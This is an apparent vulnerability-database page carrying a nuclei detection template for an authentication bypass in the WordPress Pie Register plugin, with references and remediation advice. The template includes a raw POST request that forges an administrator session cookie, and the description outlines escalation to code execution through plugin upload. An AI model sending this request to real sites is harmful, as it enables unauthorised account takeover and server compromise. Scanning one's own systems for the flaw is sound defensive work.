Lucene search
K

WordPress Pie Register <= 3.7.1.4 - Authentication Bypass

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 69 Views

Authentication bypass in WordPress Pie Register plugin allows attackers to impersonate users remotely.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
wp-pie-exploit
13 Apr 202617:37
githubexploit
GithubExploit
Exploit for CVE-2025-34077
9 Jul 202522:37
githubexploit
GithubExploit
Ntemplatesbyxit
7 May 202615:36
githubexploit
GithubExploit
Exploit for CVE-2025-34077
28 Jul 202520:05
githubexploit
Circl
CVE-2025-34077
2 Nov 202114:37
circl
CNNVD
WordPress plugin Pie Register 安全漏洞
9 Jul 202500:00
cnnvd
CVE
CVE-2025-34077
9 Jul 202500:49
cve
Cvelist
CVE-2025-34077 WordPress Pie Register Plugin ≤ 3.7.1.4 Authentication Bypass RCE
9 Jul 202500:49
cvelist
Exploit DB
Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
22 Jul 202500:00
exploitdb
EUVD
EUVD-2025-20764
9 Jul 202500:49
euvd
Rows per page
id: CVE-2025-34077

info:
  name: WordPress Pie Register <= 3.7.1.4 - Authentication Bypass
  author: kylew1004
  severity: critical
  description: |
    An authentication bypass vulnerability exists in the WordPress Pie Register plugin ≤ 3.7.1.4 that allows unauthenticated attackers to impersonate arbitrary users by submitting a crafted POST request to the login endpoint. By setting social_site=true and manipulating the user_id_social_site parameter, an attacker can generate a valid WordPress session cookie for any user ID, including administrators.Once authenticated, the attacker may exploit plugin upload functionality to install a malicious plugin containing arbitrary PHP code, resulting in remote code execution on the underlying server.
  impact: |
    Unauthenticated attackers can impersonate any user including administrators by manipulating the user_id_social_site parameter, potentially leading to complete site takeover through malicious plugin uploads.
  remediation: |
    Upgrade WordPress Pie Register plugin to version 3.7.2.0 or later that properly validates social login authentication.
  reference:
    - https://github.com/MrjHaxcore/CVE-2025-34077
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34077
    - https://securityvulnerability.io/vulnerability/CVE-2025-34077
  classification:
    epss-score: 0.09903
    epss-percentile: 0.95002
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/pie-register/"
  tags: cve,cve2025,wordpress,wp-plugin,pie-register,wp,auth-bypass,vuln

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null

    matchers:
      - type: dsl
        dsl:
          - "contains(set_cookie,'wordpress_logged_in_')"
          - "status_code==302"
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-admin/index.php HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Dashboard","Plugins","Edit Profile")'
        condition: and
# digest: 4a0a0047304502200764347de21b31f575616e8ed67e1e251419916987bafdc9736e1a53c3ddd307022100e72d352095b4d46a807c7cb125e21f96e432cd19367e1b648fe15481354a4406:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
8High risk
Vulners AI Score8
CVSS 410
EPSS0.09903
SSVC
69